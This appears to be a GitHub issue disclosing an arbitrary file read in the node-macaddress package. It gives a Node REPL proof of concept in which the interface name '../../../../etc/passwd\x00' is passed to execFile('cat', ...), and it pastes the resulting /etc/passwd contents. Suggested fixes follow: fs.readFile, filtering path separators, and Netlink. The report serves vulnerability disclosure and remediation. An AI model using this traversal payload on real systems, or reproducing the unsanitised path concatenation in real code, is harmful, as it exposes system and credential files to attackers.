This is still vulnerable to arbitrary file read #1
Description
@q3k originally reported from https://github.com/scravy/node-macaddress/pull/20
This is still vulnerable to arbitrary file read:
> let execFile = require('child_process').execFile; undefined > let garbage = function (iface, callback) { ... execFile("cat", ["/sys/class/net/" + iface + "/address"], function (err, out) { ..... if (err) { ....... callback(err, null); ....... return; ....... } ..... callback(null, out.trim().toLowerCase()); ..... }); ... }; undefined > garbage("../../../../etc/passwd\x00", (e, o) => { console.log(o); }) undefined > root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:mailing list manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:gnats bug-reporting system (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:103:systemd time synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:104:systemd network management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:105:systemd resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:106:systemd bus proxy,,,:/run/systemd:/bin/false node:x:1000:1000::/home/node:/bin/bash >I recommend at least using a proper file read function which will panic on null bytes and to manually filter out any pathseps from the given iface:
> require('fs').readFile('/sys/class/net/../../../../../etc/passwd\x00/address', (e, o) => { console.log(o); }) TypeError [ERR_INVALID_ARG_VALUE]: The argument 'path' must be a string or Uint8Array without null bytes. Received '/sys/class/net/../../../../../etc/passwd\u0000/address' at Object.fs.readFile (fs.js:291:3)or even better, using real APIs to access network device information (ie. Netlink on Linux).